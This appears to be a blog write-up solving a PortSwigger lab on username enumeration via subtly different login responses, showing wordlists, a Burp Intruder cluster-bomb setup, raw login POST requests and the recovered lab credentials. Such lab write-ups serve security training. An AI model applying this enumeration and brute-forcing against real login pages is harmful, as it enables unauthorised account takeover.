Skip to content

chojnowski.it

Port Swigger Username enumeration via subtly diffe

Port Swigger Username enumeration via subtly diffe

Username enumeration via subtly different responses¶

Solution¶

Create wordlists with users and passwords¶

From website: https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-subtly-different-responses
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via subtly different responses]
└─$ head -n2 *.txt
==> pass.txt <==
123456
password

==> user.txt <==
carlos
root

┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via subtly different responses]
└─$

Open the website: https://0ae30013032944e680927178001800cb.web-security-academy.net/login¶

https://0ae30013032944e680927178001800cb.web-security-academy.net/login

Choose: "Cluster attack bomb"
Add wordlists to "Payload position" from local wordlists
---
POST /login HTTP/2
Host: 0ae30013032944e680927178001800cb.web-security-academy.net
Cookie: session=RInLSl1fkoteuODZMoRILdZ8AorqHlcF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: https://0ae30013032944e680927178001800cb.web-security-academy.net
Referer: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=admin&password=pass

Found correct creds - Intruder¶

Found correct login and password
U: user
P: pepper

Focus on response only: 73kb 
---
POST /login HTTP/2
Host: 0ae30013032944e680927178001800cb.web-security-academy.net
Cookie: session=RInLSl1fkoteuODZMoRILdZ8AorqHlcF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: https://0ae30013032944e680927178001800cb.web-security-academy.net
Referer: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

username=user&password=pepper

POST /login HTTP/2
Host: 0ae30013032944e680927178001800cb.web-security-academy.net
Cookie: session=RInLSl1fkoteuODZMoRILdZ8AorqHlcF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0ae30013032944e680927178001800cb.web-security-academy.net
Referer: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=user&password=pepper

Solved¶